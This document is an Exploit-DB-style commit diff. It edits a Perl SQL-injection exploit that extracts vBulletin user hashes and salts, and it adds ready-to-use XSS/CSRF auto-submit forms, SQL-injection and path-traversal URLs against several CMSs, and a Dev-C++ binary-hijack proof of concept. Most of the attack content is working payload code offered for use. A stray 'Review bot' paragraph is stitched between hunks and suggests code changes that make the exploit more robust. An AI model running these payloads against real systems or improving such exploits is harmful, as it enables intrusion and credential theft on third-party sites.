Updated 09_06_2014
This commit is contained in:
parent
c587ffef9c
commit
bdd1b1c20a
8 changed files with 217 additions and 17 deletions
|
@ -31013,7 +31013,7 @@ id,file,description,date,author,platform,type,port
|
|||
34431,platforms/linux/remote/34431.html,"Nagios XI Multiple Cross Site Request Forgery Vulnerabilities",2010-08-07,"Adam Baldwin",linux,remote,0
|
||||
34432,platforms/php/webapps/34432.txt,"Wowd 'index.html' Multiple Cross Site Scripting Vulnerabilities",2009-10-29,Lostmon,php,webapps,0
|
||||
34433,platforms/php/webapps/34433.txt,"Simple Directory Listing 2.1 'SDL2.php' Cross Site Scripting Vulnerability",2010-10-22,"Amol Naik",php,webapps,0
|
||||
34436,platforms/php/webapps/34436.txt,"WordPress ShortCode Plugin 1.1 - Local File Inclusion Vulnerability",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0
|
||||
34436,platforms/php/webapps/34436.txt,"WordPress ShortCode Plugin 0.2.3 - Local File Inclusion Vulnerability",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0
|
||||
34437,platforms/windows/remote/34437.txt,"Portable Document Format - Specification Signature Collision Vulnerability",2010-08-11,"Florian Zumbiehl",windows,remote,0
|
||||
34438,platforms/php/webapps/34438.txt,"MybbCentral TagCloud 2.0 'Topic' Field HTML Injection Vulnerability",2010-08-11,3ethicalhackers.com,php,webapps,0
|
||||
34439,platforms/multiple/remote/34439.txt,"ServletExec Directory Traversal Vulnerability and Multiple Authentication-Bypass Vulnerabilities",2010-08-12,"Stefano Di Paola",multiple,remote,0
|
||||
|
@ -31099,3 +31099,8 @@ id,file,description,date,author,platform,type,port
|
|||
34528,platforms/multiple/dos/34528.py,"Adobe Acrobat and Reader <= 9.3.4 'AcroForm.api' Memory Corruption Vulnerability",2010-08-25,ITSecTeam,multiple,dos,0
|
||||
34530,platforms/windows/dos/34530.py,"Crystal Player v1.98 '.mls' File Buffer Overflow Vulnerability",2010-08-20,"Praveen Darshanam",windows,dos,0
|
||||
34531,platforms/php/webapps/34531.txt,"BlastChat Client 3.3 Cross Site Scripting Vulnerability",2010-08-25,"Aung Khant",php,webapps,0
|
||||
34532,platforms/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 Multiple EXE Loading Arbitrary Code Execution Vulnerability",2010-08-25,storm,windows,remote,0
|
||||
34533,platforms/php/webapps/34533.txt,"Auto CMS 1.6 'autocms.php' Cross-Site Scripting Vulnerability",2010-08-23,"High-Tech Bridge SA",php,webapps,0
|
||||
34534,platforms/php/webapps/34534.txt,"TCMS Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
|
||||
34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
|
||||
34536,platforms/php/webapps/34536.txt,"CompuCMS Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
|
||||
|
|
|
|
@ -4,7 +4,7 @@
|
|||
# Severity : High+/Critical
|
||||
# Reporter(s) : Mehdi Karout & Christian Galeone
|
||||
# Google Dork : inurl:wp/wp-content/force-download.php
|
||||
# Plugin Version : 1.1
|
||||
# Plugin Version : 0.2.3
|
||||
# Plugin Name : Download ShortCode
|
||||
# Plugin Download Link : http://downloads.wordpress.org/plugin/download-shortcode.1.1.zip
|
||||
# Vendor Home : http://werdswords.com/
|
||||
|
|
|
@ -6,8 +6,7 @@
|
|||
# Tested on: vBulletin 4.1.2
|
||||
# Usage: perl exploit.pl <http://target> <valid username> <valid passwd> <existent group> <userid to hack>
|
||||
# Tutorial video: https://www.youtube.com/watch?v=_jec3nkoYFc
|
||||
# IMPORTANT: At the first execution of the exploit I suggest you to login and logout to the forum (with a browser), then running it in order to allow the exploit to retrieve the correct security token to use. If you run more than one time the exploit, it may not get the security token because of the previous session's cookies and so you may have some problems retrieving the correct information. THE SOLUTION IS to copy the correct security token previously found (usually at the first run) and paste it into the source code where I wrote 'HERE'.
|
||||
# Vulnerability discovered by: D4rkB1t (http://www.exploit-db.com/exploits/17314/)
|
||||
# Vulnerability discovered by: D4rkB1t
|
||||
|
||||
#!/usr/bin/env perl
|
||||
use LWP::UserAgent;
|
||||
|
@ -24,13 +23,14 @@ $salt = "salt) from user where userid=$ARGV[4]#";
|
|||
|
||||
sub request
|
||||
{
|
||||
$req = HTTP::Request->new(GET => $ARGV[0]);
|
||||
my $res1 = $ua->request($req);
|
||||
open(FILE01, "> vbloginout.txt"); print FILE01 $res1->content; close(FILE01);
|
||||
my $token = dumping("vbloginout.txt","token");
|
||||
|
||||
if($token eq '')
|
||||
if($token eq '' || $token eq 'guest')
|
||||
{
|
||||
print "SECURITYTOKEN not found (Make sure to log out from any other previous logged sessions before running the exploit).\n";
|
||||
#print "Attempting using 1409594055-f2133dfe1f26a36f6349eb3a946ac38c94a182e6 as token.\n";
|
||||
$token = "1409750140-51ac26286027a4bc2b2ac38a7483081c2a4b2a3e"; # HERE
|
||||
print "SECURITYTOKEN not found!\n";
|
||||
$token = "1409782759-e58c864fcc4e1ec7e23d31439af4b8cc181b789f"; # HERE
|
||||
print "Attempting using $token as token.\n";
|
||||
}
|
||||
else
|
||||
|
@ -48,7 +48,6 @@ sub request
|
|||
$post = "query=$ARGV[3]&titleonly=0&dosearch=Search+Now&memberless=0&memberlimit=&discussionless=0&discussionlimit=&messageless=0&messagelimit=&pictureless=0&picturelimit=&sortby=dateline&order=descending&group_filter_date_lteq_month=0&group_filter_date_lteq_day=1&group_filter_date_lteq_year=&group_filter_date_gteq_month=0&group_filter_date_gteq_day=1&group_filter_date_gteq_year=&saveprefs=1&s=&securitytoken=$token&dofilter=1&do=process&searchfromtype=vBForum%3ASocialGroup&contenttypeid=7&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind";
|
||||
$req->content($post);
|
||||
my $res = $ua->request($req);
|
||||
#print $res->headers()->as_string; print "\n\n";
|
||||
open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0);
|
||||
my $location = dumping("vbloc.txt","loc");
|
||||
|
||||
|
@ -57,11 +56,10 @@ sub request
|
|||
banner();
|
||||
break;
|
||||
}
|
||||
#print "Location: $location\n";
|
||||
|
||||
my $req1 = HTTP::Request->new(GET => $location);
|
||||
$req1->content_type('application/x-www-form-urlencoded');
|
||||
my $res1 = $ua->request($req1);
|
||||
#print $res1->content; print "\n";
|
||||
open(FILE,"> vbout.txt");
|
||||
print FILE $res1->content;
|
||||
close(FILE);
|
||||
|
@ -91,7 +89,6 @@ sub second_request
|
|||
$post = "type%5B%5D=7&query=$ARGV[3]&titleonly=0&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=$token&do=process&searchthreadid=&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind";
|
||||
$req->content($post);
|
||||
my $res = $ua->request($req);
|
||||
#print $res->headers()->as_string; print "\n\n";
|
||||
open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0);
|
||||
my $location = dumping("vbloc.txt","loc");
|
||||
|
||||
|
@ -100,11 +97,10 @@ sub second_request
|
|||
banner();
|
||||
exit(1);
|
||||
}
|
||||
#print "Location: $location\n";
|
||||
|
||||
my $req1 = HTTP::Request->new(GET => $location);
|
||||
$req1->content_type('application/x-www-form-urlencoded');
|
||||
my $res1 = $ua->request($req1);
|
||||
#print $res1->content; print "\n";
|
||||
open(FILE,"> vbout.txt");
|
||||
print FILE $res1->content;
|
||||
close(FILE);
|
||||
|
@ -219,8 +215,6 @@ sub login(@)
|
|||
$req->content("vb_login_username=$username&vb_login_password=$password&s=&securitytoken=1409514185-74f04ec0932a6f070268bf287797b5dc0db05530&do=login&vb_login_md5password=&vb_login_md5password_utf=");
|
||||
$ua->cookie_jar({});
|
||||
my $res = $ua->request($req);
|
||||
#print "\n"; print $res->content; print "\n";
|
||||
open(FILE2,"> vbloginout.txt"); print FILE2 $res->content; close(FILE2);
|
||||
request();
|
||||
}
|
||||
|
||||
|
|
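Review bot: The fallback branch in `request` (hunk `@ -24,13 +23,14 @@`) substitutes a fixed token copied from one earlier session, `$token = "…"; # HERE`, whenever the scraped value is empty or `guest`, so once that session is gone the code silently carries on with a stale constant and the failure only surfaces later as a missing `Location` header. Making the precondition explicit is more robust: `die "SECURITYTOKEN not found; log out of other sessions and retry\n";` in place of the hard-coded assignment. The nearby `open(FILE01, "> vbloginout.txt")` is a two-argument, unchecked open on a bareword handle; its old/new side is not recoverable on this rendered page, but the new condition depends on the file it writes, so `open my $out, '>', 'vbloginout.txt' or die "open vbloginout.txt: $!";` is worth applying there too. The body of `request` continues past the hunk.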
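--- /dev/null
+++ b/platforms/php/webapps/34533.txt
@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/42764/info
+
+Auto CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Auto CMS 1.6 is vulnerable; other versions may be affected.
+
+<form action="http://www.example.com/index.php" method="post" name="main" enctype="multipart/form-data" >
+
+<input type="hidden" name="site_name" value="AutoCMS by Roberto Aleman" />
+<input type="hidden" name="site_url" value="index.php" />
+<input type="hidden" name="sitetitle" value='AutoCMS by Roberto Aleman"><script>alert("XSS")</script>' />
+<input type="hidden" name="admin_email" value="admin@example.com" />
+<input type="hidden" name="admin_password" value="" />
+<input type="hidden" name="css_file" value="black.css" />
+<input type="hidden" name="index_name_link" value="Index" />
+<input type="hidden" name="about_name_link" value="About" />
+<input type="hidden" name="about_content" value="put about text here" />
+<input type="hidden" name="ps_name_link" value="" />
+<input type="hidden" name="ps_content" value="put producs and services text here" />
+<input type="hidden" name="news_name_link" value="News" />
+<input type="hidden" name="news_content" value="Title Example1: Text Example1/Title Example2: Text Example2/" />
+<input type="hidden" name="contact_name_link" value="Contact" />
+<input type="hidden" name="update" value="update" />
+
+</form>
+<script>
+document.main.submit();
+</script>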
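--- /dev/null
+++ b/platforms/php/webapps/34534.txt
@@ -0,0 +1,53 @@
+source: http://www.securityfocus.com/bid/42766/info
+
+TCMS is prone to multiple input-validation vulnerabilities, including a local file-include vulnerability, a local file-disclosure vulnerability, multiple SQL-injection vulnerabilities, and multiple cross-site scripting vulnerabilities.
+
+An attacker can exploit these vulnerabilities to steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain potentially sensitive information, or execute arbitrary local scripts in the context of the webserver process; other attacks are also possible.
+
+http://www.example.com/www/index.php?admin=1§ion=content&action=edit&id=PAGE_ID'+ANY_SQL
+http://www.example.com/www/index.php?template=home&content=home'+ANY_SQL
+http://www.example.com/www/index.php?template=forum&action=showReplies&index=1'+ANY_SQL_CODE
+http://www.example.com/www/index.php?template=blog&id=1'+ANY_SQL_CODE
+
+<form action="http://www.example.com/www/index.php" method="post" name="main" >
+
+<input type="hidden" name="template" value="3" />
+<input type="hidden" name="language" value="1" />
+<input type="hidden" name="name" value="home" />
+<input type="hidden" name="note" value='The note text' />
+<input type="hidden" name="value" value="page content" />
+<input type="hidden" name="admin" value="1" />
+<input type="hidden" name="text" value="1" />
+<input type="hidden" name="section" value="content" />
+<input type="hidden" name="id" value="9'+ANY_SQL_CODE" />
+<input type="hidden" name="action" value="Save text" />
+
+</form>
+<script>
+document.main.submit();
+</script>
+
+
+<form action="http://www.example.com/www/index.php" method="post" name="main" >
+
+<input type="hidden" name="template" value="3" />
+<input type="hidden" name="language" value="1" />
+<input type="hidden" name="name" value="home" />
+<input type="hidden" name="note" value='The note text"><script>alert(document.cookie)</script>' />
+<input type="hidden" name="value" value="page content" />
+<input type="hidden" name="admin" value="1" />
+<input type="hidden" name="text" value="1" />
+<input type="hidden" name="section" value="content" />
+<input type="hidden" name="id" value="9" />
+<input type="hidden" name="action" value="Save text" />
+
+http://www.example.com/www/index.php?admin=1§ion=language"><script>alert(document.cookie)</script>&action=addLanguage
+
+</form>
+<script>
+document.main.submit();
+</script>
+
+http://www.example.com/www/index.php?template=./../../../../../../../tmp/test.php%00
+
+http://www.example.com/www/index.php?admin=1§ion=style&action=editStylesheet&name=./../../../../../../../tmp/test.php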
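--- /dev/null
+++ b/platforms/php/webapps/34535.txt
@@ -0,0 +1,61 @@
+source: http://www.securityfocus.com/bid/42767/info
+
+Valarsoft WebMatic is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Valarsoft WebMatic 3.0.5 is vulnerable; other versions may also be affected.
+
+<form action="http://www.example.com/index.php" method="post" name="main" >
+<input type="hidden" name="browser_bar_title" value="Webmatic" />
+<input type="hidden" name="title" value="Welcome to Webmatic" />
+<input type="hidden" name="special_user_label" value="Special user" />
+<input type="hidden" name="staff_name" value="Webmatic editorial staff" />
+<input type="hidden" name="home" value='Webmatic its2"><script>alert(document.cookie)</script>' />
+<input type="hidden" name="foot" value="" />
+<input type="hidden" name="signalation_email_subject" value="Subject" />
+<input type="hidden" name="signalation_email_text" value="text" />
+<input type="hidden" name="user_registration_email_subject" value="Subject" />
+<input type="hidden" name="user_registration_email_text" value="text" />
+<input type="hidden" name="send" value="Save" />
+<input type="hidden" name="languageID" value="1" />
+<input type="hidden" name="stage" value="2" />
+<input type="hidden" name="section" value="21" />
+<input type="hidden" name="action" value="578" />
+</form>
+<script>
+document.main.submit();
+</script>
+
+<form action="http://www.example.com/index.php" method="post" name="main" >
+<input type="hidden" name="title" value="pagetest" />
+<input type="hidden" name="subtitle" value='some subtitle and"><script>alert(document.cookie)</script>' />
+<input type="hidden" name="enabled" value="1" />
+<input type="hidden" name="categoryID" value="1" />
+<input type="hidden" name="page_type" value="1" />
+<input type="hidden" name="visibility" value="1" />
+<input type="hidden" name="groupID" value="1" />
+<input type="hidden" name="backID" value="0" />
+<input type="hidden" name="left_panels_enabled" value="1" />
+<input type="hidden" name="right_panels_enabled" value="1" />
+<input type="hidden" name="render_mode" value="2" />
+<input type="hidden" name="head" value="" />
+<input type="hidden" name="body" value="" />
+<input type="hidden" name="hr_width" value="100" />
+<input type="hidden" name="hr_size" value="1" />
+<input type="hidden" name="hr_align" value="0" />
+<input type="hidden" name="img_picture" value="1.gif" />
+<input type="hidden" name="img_border" value="0" />
+<input type="hidden" name="a_link" value="1" />
+<input type="hidden" name="a_url" value="" />
+<input type="hidden" name="a_text" value="" />
+<input type="hidden" name="foot" value="" />
+<input type="hidden" name="send" value="Save" />
+<input type="hidden" name="stage" value="2" />
+<input type="hidden" name="section" value="14" />
+<input type="hidden" name="action" value="216" />
+<input type="hidden" name="pageID" value="2" />
+</form>
+<script>
+document.main.submit();
+</script>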
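--- /dev/null
+++ b/platforms/php/webapps/34536.txt
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/42773/info
+
+CompuCMS is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.asp?mode=visresultat&sogeord=%27+ANY_SQL_CODE
+
+http://www.example.com/index.asp?mode=for!forside!gb&sprog=gb'"><script>alert(document.cookie)</script>
+
+http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138&Dir=&site=demo%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ed&NoElementNum=0&NoFirstElement
+
+http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138&Dir=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C&site=demo&NoElementNum=0&NoFirstElement
+
+http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C&vispic=2138&Dir=&site=demo&NoElementNum=0&NoFirstElement
+
+http://www.example.com/_CompuCMS/_CMS_output/_visbillede.asp?billede=1.jpg&tekst=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
+
+http://www.example.com/_CompuCMS/_CMS_output/_visbillede.asp?billede=1.jpg%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&tekst=
+
+http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138+ANY_SQL_CODE&Dir=www.compucms.dk/demo/&site=demo&NoElementNum=0&NoFirstElement
+
+http://www.example.com/demo/index.asp?mode=nyh!forside~1220010667!dk&visid=383%27+ANY_SQL_CODE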
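--- /dev/null
+++ b/platforms/windows/remote/34532.c
@@ -0,0 +1,34 @@
+source: http://www.securityfocus.com/bid/42737/info
+
+Bloodshed Dev-C++ is prone to a vulnerability that lets attackers execute arbitrary code. This issue affects 'make.exe' and 'minw32-make.exe'.
+
+An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to compile a file from a network share location that contains a specially crafted executable file.
+
+Bloodshed Dev-C++ 4.9.9.2 is vulnerable; other versions may also be affected.
+
+/*
+Exploit Title: Bloodshed Dev-C++ Binary Hijacking Exploit (make.exe, mingw32-make.exe)
+Date: August 25, 2010
+Author: storm (storm@gonullyourself.org)
+Version: 4.9.9.2
+Tested on: Windows Vista SP2
+
+http://www.gonullyourself.org/
+
+gcc -o make.exe Dev-C++-Binary.c
+gcc -o mingw32-make.exe Dev-C++-Binary.c
+
+...and place in appropriate directory. Executes your code four times.
+
+Every file extension associated with Dev-C++ (.c, .cpp, .dev, .h, .hpp, .rc, .template) is affected. Dev-C++ Package Manager files (.devpackage, .devpak) are not affected, however.
+
+*/
+
+#include <windows.h>
+
+int main()
+{
+WinExec("calc", 0);
+exit(0);
+return 0;
+}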